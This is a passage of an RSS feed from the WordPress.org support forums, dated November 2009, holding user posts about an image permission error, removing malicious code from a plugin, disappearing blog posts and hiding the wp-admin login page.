&#60;p&#62;[pro-player width='500' height='353' type='FLV' image='/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg']http://lilesnet.com/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia-OfficialTheatricalTrailer.flv[/pro-player]&#60;/p&#62;
&#60;p&#62;If I go to the directory the images are in and click the image, I can see it.  If I VFR to the image directly (i.e. &#60;a href=&#34;http://lilesnet.com/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg&#34; rel=&#34;nofollow&#34;&#62;http://lilesnet.com/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg&#60;/a&#62;) is get an error &#34;You don't have permission to access /dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg on this server.&#34;&#60;/p&#62;
&#60;p&#62;Very puzzled!  Any ideas?
&#60;/p&#62;</description>
</item>
<item>
<title>roadsidephil on "Editing triggers popup asking for username and password - security breach?"</title>
<link>http://wordpress.org/support/topic/295482/page/3#post-1280476</link>
<pubDate>Fri, 13 Nov 2009 19:22:04 +0000</pubDate>
<dc:creator>roadsidephil</dc:creator>
<guid isPermaLink="false">1280476@http://wordpress.org/support/</guid>
<description>&#60;p&#62;I've had the same problem today.  I found the malicious code in one of my plugins and removed.  Also found it in the vars.php and removed it.&#60;/p&#62;
&#60;p&#62;I'm using version 2.8.2  &#60;/p&#62;
&#60;p&#62;Now two other things are happening.  When I post a new entry from the main edit window, the resulting page is just a blank white one.  The entry does post though.  Same thing if updating an entry.  Doesn't seem to do it from the quick edit page.&#60;/p&#62;
&#60;p&#62;Also, I wanted to updgrade to 2.8.6.  When I click Upgrade Automatically it just says it's downloading the files but doesn't go any farther.
&#60;/p&#62;</description>
</item>
<item>
<title>esmi on "My posts are disappearing"</title>
<link>http://wordpress.org/support/topic/330895#post-1278898</link>
<pubDate>Thu, 12 Nov 2009 16:44:04 +0000</pubDate>
<dc:creator>esmi</dc:creator>
<guid isPermaLink="false">1278898@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Site url?
&#60;/p&#62;</description>
</item>
<item>
<title>rubytuesday on "My posts are disappearing"</title>
<link>http://wordpress.org/support/topic/330895#post-1278376</link>
<pubDate>Thu, 12 Nov 2009 03:50:18 +0000</pubDate>
<dc:creator>rubytuesday</dc:creator>
<guid isPermaLink="false">1278376@http://wordpress.org/support/</guid>
<description>&#60;p&#62;Hi all,&#60;/p&#62;
&#60;p&#62;I posted previously under another topic 'Why I am suddenly being flooded with spam?' about a sudden influx of spam that I've been getting.&#60;/p&#62;
&#60;p&#62;esmi kindly suggested since my problems were post-specific, the spam might be due to google rankings and added attention on the &#60;a href=&#34;http://www.&#34; rel=&#34;nofollow&#34;&#62;www.&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;In my spam post, I made comment that my computer was infected with a virus yesterday and I'm running in safe mode until my o/s gets fixed.&#60;/p&#62;
&#60;p&#62;Now, I'm noticing that posts are disappearing from my homepage.  The teasers of my oldest posts, which should be at the bottom of the page are moving upward as the teasers of my newer posts are disappearing from the homepage.&#60;/p&#62;
&#60;p&#62;Please help!  Is this virus/hack/security related do you think, or as esmi suggested, perhaps a coincidence?&#60;/p&#62;
&#60;p&#62;Suggestions welcome!
&#60;/p&#62;</description>
</item>
<item>
<title>ballinascreen on "how to change /wp-admin/"</title>
<link>http://wordpress.org/support/topic/241042#post-1278224</link>
<pubDate>Thu, 12 Nov 2009 00:06:52 +0000</pubDate>
<dc:creator>ballinascreen</dc:creator>
<guid isPermaLink="false">1278224@http://wordpress.org/support/</guid>
<description>&#60;p&#62;How about this:&#60;/p&#62;
&#60;p&#62;&#60;a href=&#34;http://wordpress.org/extend/plugins/stealth-login/&#34; rel=&#34;nofollow&#34;&#62;http://wordpress.org/extend/plugins/stealth-login/&#60;/a&#62;
&#60;/p&#62;</description>
</item>

</channel>
</rss>
